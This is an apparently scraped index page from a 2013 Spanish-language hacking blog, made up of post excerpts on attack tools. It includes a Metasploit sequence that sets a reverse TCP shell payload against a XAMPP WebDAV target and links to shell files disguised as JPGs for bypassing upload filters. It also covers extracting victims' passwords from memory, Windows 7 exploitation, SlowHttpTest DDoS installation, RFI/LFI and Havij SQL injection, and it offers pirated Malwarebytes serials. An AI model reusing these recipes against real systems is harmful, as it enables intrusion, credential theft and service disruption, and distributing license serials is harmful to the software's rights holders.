Les traigo en este post una distro GNU/LINUX llamada bugtraq, esta diseñada para realizar pentesting y analisis con muchas aplicaciones incluidas en su version
Las aplicaciones se clasifican en :
jueves, 31 de enero de 2013
Bugtraq Distro Linux
Les traigo en este post una distro GNU/LINUX llamada bugtraq, esta diseñada para realizar pentesting y analisis con muchas aplicaciones incluidas en su version
Las aplicaciones se clasifican en :
martes, 29 de enero de 2013
XSS (Cross Site Scripting)
Moonsols Windows Memory Toolkit
La siguiente Tool enseñara a como sacar las contraseñas ya sea de gmail, hotmail, xat.com etc en un computador con windows, explicándome un poco mejor vamos a lo siguiente:
Todo lo que ingresas en tu pc, passwords, logins etc, quedan guardadas en la memoria aun si cierras tu sesión quedara guardado, la siguiente herramienta tiene como función el recuperar las passwords.
primero vamos a las herramientas
Bypass Upload Shell
Herramienta Mozilla Live Http Headers: Addons https://addons.mozilla.org/es/firefox/addon/live-http-headers/
shell: http://www.sendspace.com/file/lc3hur
shell (extension .JPG):http://www.sendspace.com/file/flc4h9
Video tutorial: http://www.youtube.com/watch?v=lJJY75H3IEA
lunes, 28 de enero de 2013
Explotando Windows 7
Bueno el siguiente tutorial muestra como explotar windows 7 a través del puerto 445 con Metasploit.
Bueno si contamos con backtrack o Nmap en nuestro windows, lo primero es saber que windows utiliza nuestra victima
nmap -T4 -A -v "IP" - para un Scan intenso,
una vez comprobado el windows procedemos con la consola.
Aqui les va una imagen, la ip no tiene windows 7, pero sirve para que se guien..
Webdav Exploit
Exploit Usage Information
Si todo sale correcto, se abrirá una sesión meterpreter$ msfconsole## ### ## #### ## #### ###### #### ##### ##### ## #### ############# ## ## ## ## ## ## ## ## ## ## ### ######### ###### ## ##### #### ## ## ## ## ## ## #### # ## ## ## ## ## ## ##### ## ## ## ## #### ## #### ### ##### ##### ## #### #### #### #####msf > use exploit/windows/http/xampp_webdav_upload_phpmsf exploit(xampp_webdav_upload_php) > show payloadsmsf exploit(xampp_webdav_upload_php) > set PAYLOAD generic/shell_reverse_tcpmsf exploit(xampp_webdav_upload_php) > set LHOST [MY IP ADDRESS]msf exploit(xampp_webdav_upload_php) > set RHOST [TARGET IP]msf exploit(xampp_webdav_upload_php) > exploit
viernes, 25 de enero de 2013
Ataques RFI
Esta vulnerabilidad solo existe en Paginas programas en PHP, que te
permite agregar enlaces a archivos remotos situados en otros
servidores o paginas web, esta vulnerabilidad es provocada por una
mala programación o un error al programar,En la cual Puedes entrar a
muchos lados con los comandos.
2 Herramientas en Backtrack 5
Bueno en el siguiente post, conoceremos algunas herramientas de backtrack, las cuales nos serán útil a la hora de cualquier prueba de penetración.
jueves, 24 de enero de 2013
Obteniendo Ips verdaderas de webs con Cloudflare en Backtrack 5
.png)
Nuestra herramienta para lograrlo esta en Backtrack 5, llamada Fierce. Fierce es un escáner ligero escrito en PERL que ayuda a localizar espacios Ip y nombres de host en contra de dominios especificados. Esta herramienta pretende ser un precursor de Nmap, Nessus, etc, ya que todos nos entregan información valiosa. Esta herramienta fundamental utiliza las DNS y a la vez nos puede entregar Ips verdaderas de sitios protegidos por el sistema Cloudflare.
miércoles, 23 de enero de 2013
Ataques LFI
Bueno empezaremos por explicar un poco que es un ataque LFI, es una vulnerabilidad web que nos permite ejecutar archivos localmente en el servidor (local file include) y tener acceso a archivos de configuración passwords etc. Esta vulnerabilidad se ve siempre en paginas webs mal parchadas o mal editadas. Un ejemplo de una vulnerabilidad LFI es la siguiente:
Sql Injection con Havij en Windows
Hola a todos, bueno en este tutorial traigo a "Havij"
Bueno Havij en pocas palabras simplifica mucho lo que es la "Sql Injection", ademas de esto tiene una interfaz simple y rapidez en mostrar las tablas, columnas etc.
martes, 22 de enero de 2013
Malwarbytes + Licencia Full Pro
Bueno en tiempos en que la seguridad juega un rol esencial tener un poco de seguridad nunca es malo, les traigo este antimalware para Windows que a mi parecer es uno de los mejores, debido a su simpleza rapidez y eficacia. Sin mas que decir les dejo la Web oficial y los seriales.
SlowHttpTest en Backtrack 5
Bueno la siguiente herramienta fue Donada por BrowserNet para ser posteada en el Blog.
La herramienta consiste en un DDos muy potente, a mi apreciación uno de los mejores ataques de Denegación de Servicio (mejor que Slowloris), la Instalación va así:
wget http://slowhttptest.googlecode.com/files/slowhttptest-1.4.tar.gz
tar -zxvf slowhttptest-1.4.tar.gz
cd slowhttptest-1.4 (ruta del archivo)
./configure
make
make install
Ataques RDP en VPS
de Escritorio Remoto (RDP), lo ya mencionado es un problema denominado "grave" ya que
permite la ejecución de códigos remotos y por tanto el control total de la maquina.
¿Como prevenimos un Ataque mediante esta vulnerabilidad?
- Lo primero es mantener siempre nuestro Update de Windows actualizo, con esto prevenimos muchos ataques no solo el mencionado.
- Algo mas Simple es hacer esto: vamos a "Inicio - Equipo (propiedades)...
winAUTOPWN Ataques Automáticos en Windows
Les Traigo la siguiente herramienta, disponible para Windows
Que es es lo que hace?
Bueno lo primero que hace es escanear todos los puertos en busca de procesos
activos en el sistema, ademas de esto busca en su propia base de datos, exploits
disponibles para algún puerto o proceso encontrado, dando como resultado
una SHELL en el sistema,
Adminator Tool en Backtrack 5 o S.O Linux
Adminator Tools es una herramienta con la que podrán obtener información
muy importante a la hora de ejecutar pruebas de penetración, entre sus opciones
esta:
:whoisip => Busqueda de Informacion, mediante la direccion IP
:whoisdomain => Informacion general del dominio
:portscanner => Escaneo de puertos (TIPO NMAP)
:intelligence => Obtencion de datos (servidor web, sistema operativo, etc...)
:subdomain => Obtencion de los SubDominios de un Sitio web
:admin => Exelente Admin Finder
:fuzzer => Fuzzer HTTP
Modo de Uso :
